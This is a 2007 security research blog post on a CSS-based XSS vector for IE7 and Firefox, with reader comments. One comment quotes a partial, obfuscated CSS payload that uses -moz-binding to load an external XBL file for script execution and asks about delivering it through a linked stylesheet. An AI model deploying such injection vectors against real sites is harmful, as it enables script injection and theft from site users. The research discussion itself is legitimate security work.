Ultimate XSS CSS injection

Monday, 26 November 2007

Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.

Credits update

The expression part of this technique was first demonstrated by Dan on the slackers forums, nice one Dan sorry about missing you from the credits.

Please use my tool Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broke up onto multiple lines for viewing purposes, please remove the line breaks when testing the vector.

Many thanks for the credit for the window.r trick. I hope I didn’t sound like I was specifically asking for credit on slackers- I was just trying to find out If I had come across the same trick as someone else or if it was an original idea. Nonetheless, I really appreciate the mention!

An damn, is that fine or what?! Nice work with that injection. A beautiful thing…

Thanks for answer. Is it possible to use this XSS through a css file? What I’ve tryed to do is to insert <link href=”hxxp://wwwexample.com/css/xss.css”> and then <div class=”somename” style=”” id=”inject”>test</div> in html and the xss.css should look like <<< .sometext {
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#…&#x31&#x3B&#x27&#x29 : 1);
} >>>